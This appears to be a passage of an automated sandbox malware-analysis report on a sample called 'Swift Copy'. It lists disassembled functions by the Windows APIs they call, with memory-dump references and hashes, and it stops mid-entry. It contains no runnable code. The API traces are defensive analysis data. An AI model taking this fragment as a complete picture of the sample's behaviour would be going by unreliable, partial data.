                                              • ReleaseDC.USER32(?,00000000), ref: 00DC7496
                                              • GetSysColor.USER32(00000005), ref: 00DC74B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                              • String ID:
                                              • API String ID: 272304278-0
                                              • Opcode ID: 753c22d569e09460e6b6ed313af7b1ec4d95c3f9289827ab6d534356acd23f22
                                              • Instruction ID: 1071e7ffdf4ca93f42cc9d72e1567813b5b7215f60f3cb813f6fe3bfb58d6f46
                                              • Opcode Fuzzy Hash: 753c22d569e09460e6b6ed313af7b1ec4d95c3f9289827ab6d534356acd23f22
                                              • Instruction Fuzzy Hash: 23018B31404206EFDB205F65EC08FAA7BB5FB04321F250264FA15A30A0CB321E86AF61
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DD187F
                                              • UnloadUserProfile.USERENV(?,?), ref: 00DD188B
                                              • CloseHandle.KERNEL32(?), ref: 00DD1894
                                              • CloseHandle.KERNEL32(?), ref: 00DD189C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD18A5
                                              • HeapFree.KERNEL32(00000000), ref: 00DD18AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: 8f66747928f2ec7429fae3e8ada73c24e60bf29b58ed73f268c7d4035e0c75e4
                                              • Instruction ID: 6e4419053dac1f07529ccd9ae9481cef4e4b00a272f37b2849ed899ec3251be9
                                              • Opcode Fuzzy Hash: 8f66747928f2ec7429fae3e8ada73c24e60bf29b58ed73f268c7d4035e0c75e4
                                              • Instruction Fuzzy Hash: B4E0E536004102BFDB015FA2ED0C90ABF39FF49B22B208321F225A10B1CB3394A4DF90
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D7BEB3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: D%$D%$D%$D%
                                              • API String ID: 1385522511-2722557190
                                              • Opcode ID: ac0ad73fbc87e6bacbd1235752540d02750c8fa816f11a2598a8de5008f28abf
                                              • Instruction ID: a14c82fc0ba12f8e9d3ac12dd16b38748534f72415085457df4ef0dfb3bc716a
                                              • Opcode Fuzzy Hash: ac0ad73fbc87e6bacbd1235752540d02750c8fa816f11a2598a8de5008f28abf
                                              • Instruction Fuzzy Hash: F8912D75A00206DFCB14CF69C0916A9B7F1FF59324F64C15EE989AB351E731E981CBA0
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC6EE
                                              • _wcslen.LIBCMT ref: 00DDC735
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC79C
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DDC7CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info_wcslen$Default
                                              • String ID: 0
                                              • API String ID: 1227352736-4108050209
                                              • Opcode ID: 9295e75f67a8f9173e93004c902a3e99137785e9fb6d5c54ac607e3f1673d491
                                              • Instruction ID: 30d0f4abd4db1180764fbcd75b66ba29fd7c9967efae66db35f0b9709d205825
                                              • Opcode Fuzzy Hash: 9295e75f67a8f9173e93004c902a3e99137785e9fb6d5c54ac607e3f1673d491
                                              • Instruction Fuzzy Hash: 4251B371624302ABD7159F28C845B6B77E4EF85314F082A2EF595E32E0EB70D948DB72
                                              APIs
                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00DFAEA3
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • GetProcessId.KERNEL32(00000000), ref: 00DFAF38
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFAF67
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                              • String ID: <$@
                                              • API String ID: 146682121-1426351568
                                              • Opcode ID: 28f21bf92d75e053728fc81991c26bee4fb4484be204d988e0dd4847ab373224
                                              • Instruction ID: a50873a4f72bde8ac65ec4a5ea5f174922bc1a366609827d9baf573611b64d35
                                              • Opcode Fuzzy Hash: 28f21bf92d75e053728fc81991c26bee4fb4484be204d988e0dd4847ab373224
                                              • Instruction Fuzzy Hash: 357158B1A00219DFCB14DF58C484AAEBBF0EF08310F15C499E95AAB352D774ED45CBA1
                                              APIs
                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00DD7206
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DD723C
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DD724D
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD72CF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: d196e76f56c9c5e7f797610cd29806308f15df78b733504c1fa0307e33ef0697
                                              • Instruction ID: f25833b209aada6dc170737c7b385ee65b4e0fcf5064c90542c2c161241c7863
                                              • Opcode Fuzzy Hash: d196e76f56c9c5e7f797610cd29806308f15df78b733504c1fa0307e33ef0697
                                              • Instruction Fuzzy Hash: D9416A71A05204AFDB25CF54C885A9A7FB9EF44310F2480AEBD05AF30AE7B1D944CBB4
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: HKEY_LOCAL_MACHINE$HKLM
                                              • API String ID: 176396367-4004644295
                                              • Opcode ID: fc58054f052eb35862da3df2e1991b9e249c0c3884ba8b74e0e9cbcdc63aaaf0
                                              • Instruction ID: 9bd94ecdf1234ac4e265a2601e59eafab48476a4fd226180a08c8227f3b893a2
                                              • Opcode Fuzzy Hash: fc58054f052eb35862da3df2e1991b9e249c0c3884ba8b74e0e9cbcdc63aaaf0
                                              • Instruction Fuzzy Hash: 06314573A2016D4ACB20DF2C8A514BE37919BA1750F0FE029E945AB245FA70ED60C3B0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E02F8D
                                              • LoadLibraryW.KERNEL32(?), ref: 00E02F94
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E02FA9
                                              • DestroyWindow.USER32(?), ref: 00E02FB1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                              • String ID: SysAnimate32
                                              • API String ID: 3529120543-1011021900
                                              • Opcode ID: 67aaba7a6c0e32742f4fbc6e2ebf654683bfb4ae41df8835a567c4b75d79cbfd
                                              • Instruction ID: 20bea19e2cca3213fefeec46948e7e6c4b2ee6fbbc30d4d86de5a49f07472b1f
                                              • Opcode Fuzzy Hash: 67aaba7a6c0e32742f4fbc6e2ebf654683bfb4ae41df8835a567c4b75d79cbfd
                                              • Instruction Fuzzy Hash: 9B218E71200206AFEB215F649C48EBB77F9EB593A8F20621CFA50B21D0D672DC919760
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D94D1E,00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002), ref: 00D94D8D
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D94DA0
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00D94D1E,00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000), ref: 00D94DC3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: b068522b144e6cb2e3d93aedeb0cee8829a65826195a632cf6b6e3650548a947
                                              • Instruction ID: 338b402517130e5273bff0464b7ce4f186cd48ebdd3b3367c16ac38fc52246ee
                                              • Opcode Fuzzy Hash: b068522b144e6cb2e3d93aedeb0cee8829a65826195a632cf6b6e3650548a947
                                              • Instruction Fuzzy Hash: BDF0AF34A00208BFDB119F91DC09BEDBFB4EF04712F1401A4F809B22A0DB719985CBA1
                                              APIs
                                              • LoadLibraryA.KERNEL32 ref: 00DCD3AD
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DCD3BF
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DCD3E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: GetSystemWow64DirectoryW$X64
                                              • API String ID: 145871493-2590602151
                                              • Opcode ID: 836ae5a81872a861f97698a6af04f02231ba558da9f069b4ad1c74810e4b9ce0
                                              • Instruction ID: 1f9c767d5c14feffb56f758e1082c22435b68b54cdd9241ffc513447b42b88c9
                                              • Opcode Fuzzy Hash: 836ae5a81872a861f97698a6af04f02231ba558da9f069b4ad1c74810e4b9ce0
                                              • Instruction Fuzzy Hash: EDF020308026239BCB312B118C18F2AB222AF50B01F79927DE446F3080DB30CC8486F7
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E9C
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D74EAE
                                              • FreeLibrary.KERNEL32(00000000,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-3689287502
                                              • Opcode ID: 8ecf16a3c2aed7e2b0adc34dadfd7fc0a17d69e6d497923f4cff37255492768a
                                              • Instruction ID: 488e4abf6c036ddbc1d096ff4caeb2d6f814e067206ca71a43794f2bde2c1d96
                                              • Opcode Fuzzy Hash: 8ecf16a3c2aed7e2b0adc34dadfd7fc0a17d69e6d497923f4cff37255492768a
                                              • Instruction Fuzzy Hash: 5FE08636A026225FD22217266C18A6B6564AF81B72B194215FC04F2140EB64CD4585B1
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E62
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D74E74
                                              • FreeLibrary.KERNEL32(00000000,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-1355242751
                                              • Opcode ID: c86a7d35bbcf2672f9b2a07db6cb9e96965e3da00377082d1625d770c452ccd2
                                              • Instruction ID: 3d137ffd71a19b0ddeeed1fd33a61d6bce655ac73729c4994326b243347bcf82
                                              • Opcode Fuzzy Hash: c86a7d35bbcf2672f9b2a07db6cb9e96965e3da00377082d1625d770c452ccd2
                                              • Instruction Fuzzy Hash: A2D0C2325036316BC6231B266C0CD8B2A2CEF85B213195710B818F2154DF61CD41C6E0
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00DFA427
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DFA435
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DFA468
                                              • CloseHandle.KERNEL32(?), ref: 00DFA63D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                              • String ID:
                                              • API String ID: 3488606520-0
                                              • Opcode ID: 6153d6342cd4a2b1431d31a4667338d41365eb7a68fe488744390bdd35265e7a
                                              • Instruction ID: 6cf49d80752408cc3c84fe063b1d9e9739cb0a680b0cf88ff91767919ff3568c
                                              • Opcode Fuzzy Hash: 6153d6342cd4a2b1431d31a4667338d41365eb7a68fe488744390bdd35265e7a
                                              • Instruction Fuzzy Hash: FBA1A0B16047019FD720DF28C882B2AB7E5EF84714F14C85DF9599B392D770EC418BA2
                                              APIs
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCF22,?), ref: 00DDDDFD
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCF22,?), ref: 00DDDE16
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00DDE473
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDE4AC
                                              • _wcslen.LIBCMT ref: 00DDE5EB
                                              • _wcslen.LIBCMT ref: 00DDE603
                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DDE650
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                              • String ID:
                                              • API String ID: 3183298772-0
                                              • Opcode ID: 2b509098e39041ccc6f76e5b34cc037398073afb8a61c14c7f05dc8ce39ca193
                                              • Instruction ID: bc8f6b6f93d6cbabb44d3b3dbd37083d701383e31d64a1be2b9ba3da95b5cb67
                                              • Opcode Fuzzy Hash: 2b509098e39041ccc6f76e5b34cc037398073afb8a61c14c7f05dc8ce39ca193
                                              • Instruction Fuzzy Hash: 6C5160B24087455BCB24EB90D8919DFB3DCEF84340F04491FF58997291EE74E5888776
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
